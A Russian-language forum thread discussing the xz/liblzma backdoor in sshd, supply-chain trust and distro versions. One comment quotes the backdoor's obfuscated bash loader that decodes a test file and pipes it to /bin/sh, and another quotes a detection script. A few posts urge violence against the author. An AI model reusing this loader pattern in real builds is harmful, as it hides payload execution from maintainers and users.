- И как понять что тот бекдор успел натворить Если он больше месяца существует , semester (ok), 22:43 , 29-Мрт-24 (1) +2
И как понять что тот бекдор успел натворить? Если он больше месяца существует.
- For our openSUSE Tumbleweed users where SSH is exposed to the internet we recomm, Bonbon (?), 22:50 , 29-Мрт-24 (4) +1
- Не просто больше месяца существует - автор бэкдора 2 года в проекте и отпра, Alexander_R (ok), 22:59 , 29-Мрт-24 (9) +11 [^]
- Audit Accounting MAC и логи на другой сервер, который без бекдора с xz Тогд, Аноним (98), 07:55 , 30-Мрт-24 (98) +1
- Короче Инцидент был и он в дистрибутивах был, которые никто в здравом уме не бу, FSA (??), 22:51 , 29-Мрт-24 (5) –14 [VVV]
Короче. Инцидент был и он в дистрибутивах был, которые никто в здравом уме не будет ставить на прод. А ломать домашние машины... которые по какой-то причине выставлены в сеть... ну это цель нужна и ждать подходящего момента... сомнительное удовольствие.
- Создать ботнет и наехать на конкретных , не , Аноним (7), 22:56 , 29-Мрт-24 (7) +4
- На домашних машинах может быть столько криптовалюты что целой группе авторов хва, NameName (?), 09:31 , 30-Мрт-24 (119)
- Протроянить Васяна, который собирает пакетики для прода - тянет на цель rosa20, n00by (ok), 10:19 , 30-Мрт-24 (141) +4
- найти и наказать гада 8212 это одно, не допускать такого в принципе 8212 д, Перастерос (ok), 22:52 , 29-Мрт-24 (6) +2
найти и наказать гада — это одно, не допускать такого в принципе — другое..
- Во Если уж бэкдор, то только хардварный, только хардкор Не допускать васянство, Аноним (33), 00:18 , 30-Мрт-24 (33) +4
- Нужно заставить гада извиниться на камеру, Аноним (79), 02:57 , 30-Мрт-24 (79) +1
- ну попробуй, заставь сотрудника правительственной связи ее величества это сделат, Sw00p aka Jerom (?), 08:24 , 30-Мрт-24 (105) +2
- Какой, извиниться Его валить нужно А если есть семья, то и семью , adolfus (ok), 20:32 , 31-Мрт-24 (381) –2
- И отрезать ему ухо , vantoo (ok), 15:43 , 02-Апр-24 (410)
- хз-utils, ну что, уважаемо, эпично Эта библиотека есть прям везде И самое дурн, kusb (?), 22:58 , 29-Мрт-24 (8) +3
хз-utils, ну что, уважаемо, эпично. Эта библиотека есть прям везде. И самое дурное, ведь архиватору не нужен доступ почти ни к чему. Но такой изоляции нет.
- Да что ты говоришь Это же чушь несусветная RHEL или MS напрямую у тебя берут д, sesto (?), 23:23 , 29-Мрт-24 (13) –7 [V]
- Эпично, что гуманитарий уловил суть, а технарь , слегка подвинутый на идеолог, n00by (ok), 10:22 , 30-Мрт-24 (144)
- Ага, уже пошёл смотреть все сорсы всех либ, используемых в моем дистре, начиная , Аноним (354), 09:53 , 31-Мрт-24 (354) +1
- в дебианах даже 12м нет пока сам не поставишь на rhel сильно старое нашёл ср, pelmaniac (?), 18:03 , 30-Мрт-24 (312) –1
- Я уже много лет говорю об этой проблеме и о том, как плохо обстоят дела с безопа, birdie (ok), 23:15 , 29-Мрт-24 (11) –24 [VVV]
Я уже много лет говорю об этой проблеме и о том, как плохо обстоят дела с безопасностью в Linux. Я знал, что что-то подобное случится, и это случилось.Почти все дистрибутивы, за исключением, может быть, RHEL, торопятся выложить пакеты из upstream, никогда не проверяя, что исходный код не был затроянен. Хуже того, независимые мейнтейнеры, назначенные для работы с пакетами, часто даже не являются разработчиками, так что у них нет ни возможностей, ни квалификации, чтобы прочитать код и убедиться, что он по-прежнему заслуживает доверия. Часто сопровождающие отвечают за несколько пакетов, и в то же время это не является их основной работой или тем, за что они получают зарплату, поэтому они практически не заинтересованы в том, чтобы все было правильно. В то время как крупные корпорации, такие как Microsoft, Google или Apple, одобряют каждую строчку кода, которая попадает к вам как к клиенту, в мире Linux такого не существует. И дело не только в Linux, FreeBSD тоже страдает от этого. Я не уверен насчет OpenBSD/NetBSD, поскольку никогда их не использовал. Можно ли решить эту проблему? Понятия не имею. Дистрибутивы Linux должны предпринять согласованные усилия по проверке пакетов и отмечать их как "доверенные". Я никогда не слышал ни о чем подобном, за исключением RHEL, который не является настольным дистрибутивом и, кроме того, сильно ограничил свои связи с сообществом. Это не проблема XZ. Это проблема всей экосистемы Linux. Вопрос безопасности, надежности, доверия и проверяемости.
- Все ок, но про одобрение каждой строчки кода уже слишком жирно, Аноним (15), 23:27 , 29-Мрт-24 (15) +10 [^]
- Каким боком здесь безопасность линукса Это не дыра в ядре, не эскалация привиле, Аноним (18), 23:29 , 29-Мрт-24 (18) +10 [^]
- ну объективно говоря от этого приложения зависит пол системы Может я не прав, н, semester (ok), 23:33 , 29-Мрт-24 (19) +1
- Да, но если так же скомпрометировать популярную библиотеку на винде, разница буд, Аноним (18), 00:02 , 30-Мрт-24 (27) +2
- В формулировке ошибка это компонент системы, а не приложение, как его пытался в, n00by (ok), 10:27 , 30-Мрт-24 (146)
- да откуда вы такие беретесь не зависит от xz ничего, его даже поставить надо ру, pelmaniac (?), 18:05 , 30-Мрт-24 (313)
- Примеры backdoors в продуктах Microsoft в студию Хотя бы один за 40 с лишним ле, birdie (ok), 23:46 , 29-Мрт-24 (20) –13 [VVV]
- Сначала ты примеры backdoors в продуктах Linux Foundation в студию То есть все л, Аноним (18), 23:56 , 29-Мрт-24 (25) +4
- Ну вот буквально несколько дней назад нашли в Fedora продукте redhat, платиново, Аноним (40), 00:32 , 30-Мрт-24 (40)
- Да легко Как насчет Bvp47 По слухам связан с NSA, но проверить естественно нево, Fyjy (-), 00:37 , 30-Мрт-24 (45) –2
- Так падажи, но если считать дыры за умышленные бэкдоры, то винда тогда по этому , Аноним (18), 00:45 , 30-Мрт-24 (51) +6 [^]
- А про Bvp47 есть что сказать Эм как-то не получается Linux Kernel - 3876 vu, Fyjy (-), 01:06 , 30-Мрт-24 (57) –3
- Здесь стоит опять же учитывать, что например злополучный ядерный модуль ksmbd, в, Аноним (18), 01:18 , 30-Мрт-24 (61) +3
- так уязвимости ведь разные бывают- DoS Denial of Service отказ в обслуживании, твёрдый ветер (?), 01:38 , 30-Мрт-24 (67) +1
- Стоп, а почему по Винде ты взял только две последние версии Опять подгоняешь ус, Аноним (121), 09:44 , 30-Мрт-24 (121)
- Вы серьёзно Тут даже сложно комментировать ибо вы похоже очень многое пропустил, Аноним (28), 00:07 , 30-Мрт-24 (28) +1
- Держи Не захлебнись только https www cvedetails com vulnerability-list vendor, Аноним (36), 00:28 , 30-Мрт-24 (36)
- Предполагаемый автор бэкдора и у MS отметилсяhttps learn microsoft com en-US, Аноним (38), 00:28 , 30-Мрт-24 (38) +1
- Да вся винда бэкдор для МС Хотят качают телеметрию от пользователя, хотят ставя, Jh (?), 11:18 , 30-Мрт-24 (172) –1
- Как-то утек в открытый доступ сервис пак для NT с неудаленными отладочными симво, Аноним (84), 12:20 , 30-Мрт-24 (217) –1
- Всякие ремотные активации с customer experience improvement с отсылкой нажатий, Аноним (-), 01:08 , 04-Апр-24 (412)
- Ну да, ядро же оно само по себе существует, ему же вообще ничего не нужно Прикл, Аноним (68), 01:39 , 30-Мрт-24 (68)
- можно поподробнее о том как крупные корпорации одобряют каждую строчку кода , твёрдый ветер (?), 23:48 , 29-Мрт-24 (23) +1
- К вопросу о RHEL 1 We built 5 6 0 for Fedora 40 41 Jia Tan was very insist, Bonbon (?), 08:04 , 30-Мрт-24 (100) +1
- Ага, наивный Работал я в крупных компаниях Строчки там одобряют неглядя за ред, Аноним (117), 09:27 , 30-Мрт-24 (117)
- Cisco достаточно крупная корпорация Все же помним доступ по curl А исправление, Аноним (211), 12:04 , 30-Мрт-24 (211)
- Тем временем https overclockers ru blog Docent2006 show 20835 v_routerah_cisco, Аноним (121), 13:07 , 30-Мрт-24 (241)
- Ох, лол Чел, ты же, очевидно, в коммерческой разработке никогда не участвовал , Аноним (248), 13:15 , 30-Мрт-24 (248) +1
- Скрыто модератором, Anonimous (?), 13:22 , 30-Мрт-24 (252) +2 [---]
- Это не правда В sshd не используется liblzma SSHd _можно_ собрать, слинковав с, Ано ним (?), 23:17 , 29-Мрт-24 (12) +1
- sshd дёргает метод из systemd, который дёргает liblzma То, что вы в своём Gentoo, birdie (ok), 23:29 , 29-Мрт-24 (17) –5 [V]
- Учитывая, что разрабатывают openssh разработчики openbsd, то вопрос кто тут извр, Аноним (30), 00:10 , 30-Мрт-24 (30) +8 [^]
- Нету в проекте openssh никаких обращений к libsystemd и тем более методов Умни, Аноним (43), 00:34 , 30-Мрт-24 (43) +14 [^]
- Красиво подгорает Перечитываю снова и снова, не могу налюбоваться , Аноним (40), 01:06 , 30-Мрт-24 (58) +4
- Gentoo Newer releases were signed by a potentially compromised upstream mainta, Аноним (98), 08:38 , 30-Мрт-24 (108) +1
- Тоже не понимал причём тут xz, пришлось читать оригинал , Ivan_83 (ok), 00:50 , 30-Мрт-24 (53) +2
- Вообще xz это зло https www nongnu org lzip xz_inadequate html, Аноним (15), 23:29 , 29-Мрт-24 (16) +4
- А что насчёт zstd Бяка типа xz или что-то приятное типа gz lz Есть информация , Аноним (40), 00:34 , 30-Мрт-24 (41) +1
- Слишком много букв А что они там предлагают для long-term archiving , Аноним (42), 00:34 , 30-Мрт-24 (42)
- Ничего конкретного Но вообще любой шарящий в теме человек знает, что для действи, Аноним (18), 01:04 , 30-Мрт-24 (55) +1
- Они говорят, что gzip, bzip2 и lzip в разы лучше в плане детекта различного ро, Аноним (40), 01:21 , 30-Мрт-24 (62)
- Ленту В трех экземплярах , й (?), 13:29 , 30-Мрт-24 (258)
- Gentoo проблема с sshd не аффектит, так как там не используют патчи для systemd-, Аноним (28), 23:47 , 29-Мрт-24 (22) +6 [^]
- xz --versionxz XZ Utils 5 4 1liblzma 5 4 1Хакеры 0 1 Debian stable, Аноним (33), 00:07 , 30-Мрт-24 (29)
> Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.xz --version xz (XZ Utils) 5.4.1 liblzma 5.4.1 Хакеры 0 : 1 Debian stable
- xz --versionxz XZ Utils 5 2 5liblzma 5 2 5У меня ещё древнее , Skullnet (ok), 00:25 , 30-Мрт-24 (35) +1
- Все версии за 2 года содержат код этого автора, у тебя слишком сырая версия , Аноним (48), 00:38 , 30-Мрт-24 (46)
- Угу OpenNet Я в безопасности, меня не касается, проблемы нет , Аноним (86), 04:08 , 30-Мрт-24 (86) +1
- В pkgsrc уже откатились - https pkgsrc se archivers xzНо в самом образе NetBSD, Аноним (30), 00:15 , 30-Мрт-24 (32)
- Чувак не виноват, ему просто copilot сделал автоподстановку и он случайно нажал , Аноним (34), 00:20 , 30-Мрт-24 (34) +21 [^]
Чувак не виноват, ему просто copilot сделал автоподстановку и он случайно нажал на Tab
- Скрыто модератором, Аноним (-), 00:32 , 30-Мрт-24 (39) [---]
> В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd Бекдору больше месяца. Вышло две версии, которые даже успели порастаскивать в дисты. А куда смотрели тысячи глаз? Ведь код же открыт, каждый мог его посмотреть и убедиться в его надежности. Неужели свидетели надежности опенсорса не читают сорцы при обновлении?
- Всё ещё веселей https github com google oss-fuzz issues 11760 issuecomment-20, birdie (ok), 00:36 , 30-Мрт-24 (44) +3
- fedora xz --versionxz XZ Utils 5 4 4liblzma 5 4 4ubuntu xz --versionxz XZ , Аноним (47), 00:39 , 30-Мрт-24 (47)
fedora $ xz --version xz (XZ Utils) 5.4.4 liblzma 5.4.4ubuntu $ xz --version xz (XZ Utils) 5.2.5 liblzma 5.2.5 debian $ xz --version xz (XZ Utils) 5.4.1 liblzma 5.4.1 Фух. Пронесло =)
- Ну, ладно А эти пишут, что The problem has been fixed upstream in version 5 6 1, Аноним (42), 00:41 , 30-Мрт-24 (49)
> Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться на версию 5.4.6.Ну, ладно. > https://security.archlinux.org/ASA-202403-1 А эти пишут, что "The problem has been fixed upstream in version 5.6.1."
- Хорошо, что использую Debian stable, где, как говорят эксперты , все протухло и, Аноним (56), 01:04 , 30-Мрт-24 (56) +1
Хорошо, что использую Debian stable, где, как говорят "эксперты", все протухло и он не нужен.
- Хорошо или нет, но именно дебиан среди прочих пропатчил исходники openssh таки, Аноним (40), 01:16 , 30-Мрт-24 (59) +15 [^]
- Да заметили бы, только уже при расследовании реальных взломов Но автор конечно , Аноним (18), 01:49 , 30-Мрт-24 (73)
- OpenNet Я в безопасности, меня не касается, проблемы нет , Аноним (86), 04:07 , 30-Мрт-24 (85) +1
- Ну так себе, для любителей всяких current testing unstable версий Хорошо что выя, Аноним (66), 01:36 , 30-Мрт-24 (66) –2
Ну так себе, для любителей всяких current/testing/unstable версий. Хорошо что выявили довольно быстро, если бэкдор имел более скрытые особенности могло бы годами так лежать незаметно. После такого проекту вообще нельзя больше доверять и надо его исключить из состава топ дистров.
- Тут цельное селинукс кровавой црушнёй писано, да не смутит вас ник злыдня под к, Аноним (68), 01:45 , 30-Мрт-24 (72) +2
- Матчасть бы изучил, умник Селинукс изобрели в АНБ, и по словам Сноудена они как , Аноним (66), 02:17 , 30-Мрт-24 (78) –1
- Вот и сам изучи матчасть, безопасность -- морковка для ослика, а вот поди разг, Аноним (68), 07:44 , 30-Мрт-24 (96) +2
- Сноудену безоговорочно верить, себя не уважать Учитывая где он сейчас А то как-т, Анонм (?), 10:17 , 30-Мрт-24 (140)
- Начинаем учить матчасть 1 Сноуден, прежде всего, предатель Кто не понимает, чт, n00by (ok), 10:48 , 30-Мрт-24 (152) –2
- То самое анб что протолкнуло свою поделку вместо рсбак и пах-грсек Хотя они был, Аноним (159), 10:49 , 30-Мрт-24 (153) +1
- Надо было xz на расте писать, с его наркохипанским синтаксисом никто ничего нико, Аноним (68), 01:44 , 30-Мрт-24 (70) +9 [^]
Надо было xz на расте писать, с его наркохипанским синтаксисом никто ничего никогда бы не нашёл.
- m4 Невероятно , Лутту (?), 01:51 , 30-Мрт-24 (74) +2
- Какого черта какой то ноунейм liblzma либе доступно чтение и запись в любую обла, Oe (?), 01:54 , 30-Мрт-24 (76) –2
Какого черта какой то ноунейм liblzma либе доступно чтение и запись в любую область памяти sshd? Это безопасность линукс такая? Ей богу лучше бы javascript использовали пользы было бы больше чем на сях писать.
- Иди сурсы читай sshd напрямую эту библиотеку и не использует, просто какие-то г, Аноним (125), 10:15 , 30-Мрт-24 (137) +2
- Вопрос по прежнему открыт почему ноунейм прилинкованная либа имеет доступ к пам, Oe (?), 12:24 , 30-Мрт-24 (219) –5 [V]
- в виде указателя на область памяти Ты представляешь производительность того ж, Аноним (243), 13:11 , 30-Мрт-24 (243)
- Так и запишем - пособник копирастов-тивоизастов и устаревастов , Аноним (322), 18:59 , 30-Мрт-24 (322) +1
- Иди книжку почитай как работает линковка и для чего она нужна , Легивон (?), 10:26 , 31-Мрт-24 (358) +1
- Это претензии к операционным системам, я надеюсь, а не к разработчикам прикладно, Аноним (317), 14:43 , 01-Апр-24 (405)
- Ловите его скорее, а то он и NIH-синдром поставит под сомнение , n00by (ok), 10:54 , 30-Мрт-24 (158)
- brew upgradexz 5 6 1 - 5 4 6https github com Homebrew homebrew-core pull 1675, soarin (ok), 03:34 , 30-Мрт-24 (81)
- Посжимали и хватит F, Аноним (87), 04:14 , 30-Мрт-24 (87) –1
> This repository has been disabled.Посжимали и хватит. F
- Я так понимаю, что если был любой другой инит, а не системда патч, то этот бек, Аноним (88), 05:08 , 30-Мрт-24 (88) +1
>патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzmaЯ так понимаю, что если был любой другой инит, а не системда + патч, то этот бекдор не проблема? Сами дураки, поставили инит в котором пропатчив один из модулей подвергают атаке все сразу.
- А сколько таких, которые не попались , Аноним (89), 05:20 , 30-Мрт-24 (89) +3
А сколько таких, которые не попались?!
- a xz-5 6 1-x86_64-2 txz Rebuilt Seems like a good idea to build this fro, Аноним (92), 05:38 , 30-Мрт-24 (92) +3
a/xz-5.6.1-x86_64-2.txz: Rebuilt. Seems like a good idea to build this from a git pull rather than the signed release tarballs. :-) The liblzma in the previous packages were not found to be vulnerable by the detection script, but I'd rather not carry the bad m4 files in our sources. Here's a test script for anyone wanting to try it: if hexdump -ve '1/1 "%.2x"' /lib*/liblzma.so.5 | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410 ; then echo probably vulnerable else echo probably not vulnerable fiВот вам код для проверки от Патрика.
- Вот В этом месте и надо отлавливать вредителей Ещё одно место это JIT код котор, Аноним (98), 07:51 , 30-Мрт-24 (97) +5
> в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.Вот! В этом месте и надо отлавливать вредителей. Ещё одно место это JIT код который не собирается с -fPIE надо искоренить.
- libsystemdДля меня это уже повод насторожиться, iCat (ok), 07:57 , 30-Мрт-24 (99) –1
libsystemd Для меня это уже повод насторожиться
- Интересно, на сколько лет посадят писателя этого бэкдора , вася (??), 08:04 , 30-Мрт-24 (102)
Интересно, на сколько лет посадят писателя этого бэкдора?
- Закон дышло, чужого - посадим, своего - наградим https tass ru obschestvo 170, Вова (?), 08:12 , 30-Мрт-24 (104)
- Ни на сколько, потому что в лицензии либы есть отказ от каких либо обязательств , Аноним (248), 12:04 , 30-Мрт-24 (210)
- Кто ж посадит действующего члена КПК Судя по имячку - он прям оттуда и кодил , нах. (?), 12:44 , 30-Мрт-24 (227) +1
- Хомы начинают прозревать, а вдруг не все выходы за границы буфера это просто оши, Аноним (106), 08:40 , 30-Мрт-24 (109) +1
Хомы начинают прозревать, а вдруг не все выходы за границы буфера это просто ошибка? И никакой р-ст не спасёт от злонамеренного использования.
- Какой позор для опенсорса Внезапно оказалось, что открытый код и контролируемы, Аноним (-), 09:09 , 30-Мрт-24 (111) –7 [V]
Какой позор для опенсорса... Внезапно оказалось, что открытый код и контролируемые репозитории не спасают от бекдоров... У фанатиков срочный перерыв на переписывание методичек))
- Не удивлюсь, если во всех проектах на automake, включая rpm и firejail, такое пр, Аноним (123), 09:51 , 30-Мрт-24 (123) +4
>Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4Не удивлюсь, если во всех проектах на automake, включая rpm и firejail, такое происходит. Потому что automake - это специальное говно, к которому никто прикасаться и даже смотреть не будет. А те, кто упорствует в своей ереси по использованию automake - пособники бэкдорщиков.
- Но идиотские дистры вроде Дебиана продолжат собирарь из архивов , Аноним (123), 09:53 , 30-Мрт-24 (124) –1
>Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории.Но идиотские дистры вроде Дебиана продолжат собирарь из архивов.
- Так это в Сид каком-нибудь только прилетело,навряд ли в обычный Дебиан попало , сщта (?), 10:06 , 30-Мрт-24 (126) +1
Так это в Сид каком-нибудь только прилетело,навряд ли в обычный Дебиан попало.
- Эта либа себя дискредитировала Jia Tan коммитил в течение для двух лет и любой и, Аноним (-), 10:08 , 30-Мрт-24 (128) +3
Эта либа себя дискредитировала. Jia Tan коммитил в течение для двух лет и любой из этих коммитов не вызывает доверия. Нужна замена. Более надежная. Например написанная на расте.
- В расте и обфусцировать бэкдор не надо будет - в коде просто никто и так не разб, Аноним (166), 10:09 , 30-Мрт-24 (130) +1
- Код уже написан и уже внедрен в какой-то мутный драйвер из 100 строк , Аноним (106), 10:11 , 30-Мрт-24 (132)
- В расте нет такого древнего легаси как m4 скрипты Там нормальная человекочитаема, Аноним (-), 10:17 , 30-Мрт-24 (139) +2
- Ты хотел сказать что на рсте вообще нет никакого продакшн кода , Аноним (106), 11:27 , 30-Мрт-24 (183)
- Тянущая всё с гитхабчика, ага Ночью по CET PST дядя Ляо сделал git push, дядя Л, Аноним (292), 15:52 , 30-Мрт-24 (297) +1
- 1 сама тянущая все зависимости, какие укажут разработчики пакетов укажут и , Аноним (321), 18:55 , 30-Мрт-24 (321) +1
- Кто захочет писать безопасно на Си - тот будет писать безопасно на Си Неосилято, Аноним (364), 16:50 , 31-Мрт-24 (368) +1
- Не переживай, раст и прочая скриптуха также подвержена подобным проблемам И дел, jsforever (ok), 17:26 , 31-Мрт-24 (373)
- В расте не смогут разобраться только неосиляторы Там гугл переучивает разработчи, Аноним (-), 10:54 , 30-Мрт-24 (157) –1
- Умник, ты хоть посмотри для чего использовался bash Или ты из очередных не чит, Аноним (195), 11:38 , 30-Мрт-24 (194)
- Использование Хруста как-то мешает использовать в проекте m4 и bash Выдыхай, бо, Аноним (364), 16:52 , 31-Мрт-24 (369)
- Там уже есть весь этот отстой - это макросы Проблемы всё те же, что и у баш м4 , jsforever (ok), 17:28 , 31-Мрт-24 (374)
- На Питоне замучаешься обфуцировать Вот это язык так язык Хех-хех , microcoder (ok), 23:26 , 30-Мрт-24 (341)
- m4-макрос, дата редиза - 1977 годКонечно использовать инструменты полувековой да, Анонм (?), 10:14 , 30-Мрт-24 (136) +5
m4-макрос, дата редиза - 1977 год Конечно использовать инструменты полувековой давно так безопасно!Которые в последствии порождают (хотя честнее сказать высрыают) баш портянку такого вида
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh-dc|/bin/sh
Да за такой код, без комментариев "чего оно делает", нужно просто закрывать ПР без разговоров. Хотя я вообще сомневаюсь, что этот кал кто-то читал.
- Тысячи глаз , Аноним (166), 10:16 , 30-Мрт-24 (138)
- Бывают и злые Васяны,ничего тут не сделаешь Вон в Кеды тоже свину подложили и н, сщта (?), 10:20 , 30-Мрт-24 (143)
- Как раз эти пресловутые тысячи глаз и сработали Поймал не человек, занимающий, sqrt (?), 10:32 , 30-Мрт-24 (150) +8 [^]
- Не, тут к сожалению не только это Чел сначала предложил коммит с отключением фаз, Аноним (-), 10:39 , 30-Мрт-24 (151) +1
- GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые те, zeecape (ok), 10:27 , 30-Мрт-24 (145) +3
"GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые теперь недоступны для анализа и загрузки прошлых версий" Microsoft: Какой эксплойт? Вам просто показалось! ("Незаметно" убрали эксплойт)
- Хахаха, а теперь расскажите мне, как в типа серьезных проектах используют авто, Анонм (-), 10:32 , 30-Мрт-24 (149)
> Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании. Хахаха, а теперь расскажите мне, как в (типа) серьезных проектах используют автотесты, санитайзеры и фаззинг. А никак! Если есть какая-то возможность их отключить, то их отключают, по просьбе какого-то васяна и это апрувит создатель проекта. ps уверен потом такие же клооуны будут бухтеть "зачем пихать проверки в компилятор? есть же куча санитайзеров и прочих инструментов, надо просто их использовать и будет вам счастье"
- О, история становится еще интереснее Чел поучаствовал во многих проектах Наприме, Аноним (-), 10:51 , 30-Мрт-24 (155) +3
О, история становится еще интереснее! Чел поучаствовал во многих проектах. Например в libarchive. Где он создал ПР в котором заменил safe_fprintf на fprintf. https://github.com/libarchive/libarchive/pull/1609/filesИЧСХ этот ПР приняли! Вообще без какого-то обсуждения. А не спросили "какого?!". Но для проекта C 89.6%.. впрочем, я совершенно не удивлен)) И оно жило спокойно с ноября 2021 года, до сегодняю. Код ревертнули девять часов назад.
- Ну, libarchive кривое, не страшно Её никто в своём уме не будет использовать А, Аноним (48), 11:10 , 30-Мрт-24 (165)
- самое слабое звено в системе безопасности 8212 это человек с Кевин Митник, Аноним (166), 11:17 , 30-Мрт-24 (170) +2
- Это же какую логику нужно иметь, чтобы связать прием патча с изменения в коде с , Аноним (195), 11:34 , 30-Мрт-24 (190)
- Типа если люди пишут на Си, им как правило, глубоко плевать на безопаснось , Аноним (248), 11:44 , 30-Мрт-24 (198)
- Не знаю как в GO, но в раст все принты по умолчанию safe А чтобы сделать ансейф , Аноним (-), 11:49 , 30-Мрт-24 (201) –1
- Думаешь китаец испугался бы слова unsafe и не сделал бы коммит БезопасТность ур, Аноним (106), 12:01 , 30-Мрт-24 (209) +1
- А это зависит от разных вариантов Например есть либы в расте которые помечены , Аноним (-), 12:19 , 30-Мрт-24 (216) –1
- Но тебе захотелось попиариться, вот же ж незадача , Аноним (292), 15:57 , 30-Мрт-24 (300)
- На этом обсуждение можно было и закончить , Аноним (364), 17:04 , 31-Мрт-24 (372)
- Например есль скрипты в баше которые просто пускают команды, без каких-либо по, jsforever (ok), 18:42 , 31-Мрт-24 (379)
- - Удалённо эксплуатируемая уязвимость в драйвере NVMe-oF TCP из состава ядра Lin, Аноним (-), 12:08 , 30-Мрт-24 (213) –1
- Любая сторонняя либа это потенциальный источник трояна, соответственно код либы , Oe (?), 12:53 , 30-Мрт-24 (234) –1
- Эту историю читаешь и плакать хочется Один из коммитов етого псевдокитайца в oss, Аноним (339), 23:18 , 30-Мрт-24 (339)
- Заметьте изменения были введены после обязательного введения 2FA на GitHub не , Аноним (123), 11:17 , 30-Мрт-24 (169)
Заметьте: изменения были введены после обязательного введения 2FA на GitHub (не подумайте, что с целью усиления "безопасности", до очень недавнего времени без активации 2FA можно было пушить в репозитории, к которым есть доступ, да и сейчас наверное при пуше используется только 1 фактор, а с целью продвижения FIDO2 - бэкдорнутого стандарта, придуманного с целью навязывания продуктов членов Альянса, завязывания аутентификации на них и сбора биометрии). Как я и предупреждал, от сопровождающего-вредителя, а равно — коммерсанта, продавшего проект за круглую сумму, а равно "патриота" государства, в котором живёт и получает зарплату ничего не поможет, а равно просто фраера-лоха, которому сделали предложение, от которого невозможно отказаться: в общем случае от supply chain-атаки, где "легитимный" сопровождающий делает вредоносные изменения, не спасёт ничего. А "Jia Tan" — это просто кукла из носка, которая на руку одевается, как в "Улице Сезам", чтобы смягчить последствия для сопровождающих, что типа Шоколад ни в чём не уиноуат!Все авторы забекдоренных проектов должны рассматриваться как соучастники.
- Libselinux также поддерживает liblzma и связывается с гораздо большим количество, Аноним (186), 11:29 , 30-Мрт-24 (186)
Libselinux также поддерживает liblzma и связывается с гораздо большим количеством программ, чем libsystemd.
- Накалякал в Федору https pagure io fesco issue 3185Посмотрим что из этого вый, Аноним (288), 12:48 , 30-Мрт-24 (229)
- Вот он - Linux way , Аноним (238), 13:00 , 30-Мрт-24 (238) +3
> бэкдор был спрятан в m4-макросах .. инструментарием automakeВот он - Linux way!
- Люди, которые считают,что в PID 1 непременно нужно вкрячить библиотеку компресси, й (?), 13:23 , 30-Мрт-24 (253) +3
Люди, которые считают,что в PID 1 непременно нужно вкрячить библиотеку компрессии (а также картину корзину картонку и маленькую собачонку) - должны быть готовы к таким сюрпризам и не жаловаться.Птушо за время пути собака будет расти.
- атака классная респект китайцу жаль, быстро спалили сижу, жую попкорн xz --, crypt (ok), 13:24 , 30-Мрт-24 (254) +1
атака классная. респект китайцу. жаль, быстро спалили. сижу, жую попкорн:$ xz --version xz (XZ Utils) 5.4.5 liblzma 5.4.5 $ freebsd-version 13.3-RELEASE
- Microsoft has signaled it will add native support for tar, 7-zip, rar, gz and m, Аноним (84), 13:27 , 30-Мрт-24 (257) +1
>В 2021 году Jia Tan передал изменение в проект libarchiveMicrosoft has signaled it will add native support for tar, 7-zip, rar, gz and "many other" archive file formats to Windows - it's used the libarchive open source project https://www.theregister.com/2023/05/24/microsoft_rar_support.../ >Jia Tan несколько дней назад был включён в число мэйнтейнеров проекта XZ Embedded, используемого в ядре Linux Однако, это серьезный провал китайской киберразведки. Столько сил и лет потрачено на внедрение своего человека.
- А почему китайской Скорее всего околополяки какие-нибудь, как обычно , Аноним (48), 13:33 , 30-Мрт-24 (261)
- До того, как Github заблокировал репозиторий xz, мне почему-то мимолетно показал, mikhailnov (ok), 14:17 , 30-Мрт-24 (280)
- Единственно, что свой человек время от времени лажался и коммитил с таймзоной E, Аноним (339), 23:04 , 30-Мрт-24 (338) +2
- То, что никто не проверяет соответствие релизных архивов реальным данным в дерев, Аноним (48), 13:30 , 30-Мрт-24 (259) +1
То, что никто не проверяет соответствие релизных архивов реальным данным в дереве, достаточно удивительно на самом деле. Хотя и не это проблема тут, но изменение моментально бы обнаружилось. А то до воспроизводимых сборок и подписанных блобов додумались, а до воспроизводимых блобов с исходниками нет.
- Проблема зашита в libsystemd ldd lib x86_64-linux-gnu libsystemd so 0 linux-v, Аноним (84), 15:39 , 30-Мрт-24 (291) +1
